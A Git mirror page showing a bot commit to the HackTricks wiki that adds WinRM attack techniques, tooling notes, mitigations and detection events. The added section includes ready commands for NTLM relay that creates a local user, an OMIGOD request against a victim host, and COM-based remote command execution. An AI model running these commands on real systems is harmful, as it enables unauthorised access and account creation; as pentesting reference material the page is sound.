maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add content from: Research Update: Enhanced src/network-services-pentesting/59...

Browse Source
This commit is contained in:
HackTricks News Bot 2025-08-13 01:45:46 +00:00
parent 30fa8082d2
commit 91348afa22
2 changed files with 73 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

73
src/network-services-pentesting/5985-5986-pentesting-winrm.md
View File

@ -256,8 +256,80 @@ end
- `port:5985 Microsoft-HTTPAPI`
---
## Recent Vulnerabilities & Offensive Techniques (2021-2025)
### NTLM relay directly to WinRM (WS-MAN)
Since Impacket 0.11 (May 2023) `ntlmrelayx.py` can relay captured NTLM credentials straight to a **WS-MAN**/WinRM listener. When a host still listens on **unencrypted HTTP (5985)** an attacker can combine *mitm6* (or *Responder*) to coerce authentication and obtain SYSTEM-level code-execution:
```bash
sudo ntlmrelayx.py -t wsman://10.0.0.25 --no-smb-server -smb2support \
--command "net user pwned P@ssw0rd! /add"
```
Mitigations
* Disable HTTP listeners `Set-Item WSMan:\localhost\Service\EnableCompatibilityHttpListener -Value false`
* Force HTTPS and enable Extended Protection for Authentication (EPA) on recent Windows versions.
### OMIGOD CVE-2021-38647 (Azure OMI)
Azure Linux agents use the **Open Management Infrastructure (OMI)** service which exposes the WinRM/WS-MAN API on ports **5985/5986**. A logic error allowed **unauthenticated RCE as root**:
```text
curl http://victim:5985/wsman -H 'Content-Type:text/xml' -d '<xml />'
```
Patch or remove OMI (version ≥ 1.6.8-1) and block those ports from the Internet.
### WSMan.Automation COM abuse for lateral movement
WinRM can be driven without PowerShell via the `WSMan.Automation` COM object useful on systems in Constrained-Language mode. Tools such as *SharpWSManWinRM* wrap this technique:
```powershell
$ws = New-Object -ComObject 'WSMan.Automation'
$session = $ws.CreateSession('http://srv01:5985/wsman',0,$null)
$cmdId = $session.Command('cmd.exe',@('/c','whoami'))
$session.Signal($cmdId,0)
```
The execution chain (`svchost → wmiprvse → cmd.exe`) is identical to classic PS-Remoting.
---
## Tooling updates
* **Evil-WinRM v3.x (2024)** now supports **Kerberos** (`-k` / `--spn`) and **certificate-based** authentication (`--cert-pem`/`--key-pem`), session logging (`-L`) and the ability to disable remote path completion (`-N`).
```bash
RHOST=10.0.0.25 evil-winrm -i $RHOST -u j.doe -k --spn HTTP/$RHOST
```
* **Python `pypsrp` 0.9 (2024)** offers WinRM & PS-Remoting from Linux, including CredSSP and Kerberos:
```python
from psrp.client import Client
c = Client('srv01', username='ACME\\j.doe', ssl=True)
print(c.execute_cmd('ipconfig /all').std_out.decode())
```
* **Detection** monitor the **Microsoft-Windows-WinRM/Operational** log:
* Event 91 / 163 shell created
* Event 182 authentication failure
* In the Security log event 4262 records the source IP (added July 2022 CUs).
Collect these centrally and alert on anonymous or external IPs.
---
## Shodan
- `port:5985 Microsoft-HTTPAPI`
## References
- [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
- [https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/](https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/)
- [https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure](https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure)
- [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
## HackTricks Automatic Commands
@ -304,4 +376,3 @@ Entry_2:
{{#include ../banners/hacktricks-training.md}}

3
src/welcome/hacktricks-values-and-faq.md
View File

@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
> [!TIP]
>
> - **How can I cite a page of HackTricks?**
> - **How can I a page of HackTricks?**
As long as the link **of** the page(s) where you took the information from appears it's enough.\
If you need a bibtex you can use something like:
@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the
{{#include ../banners/hacktricks-training.md}}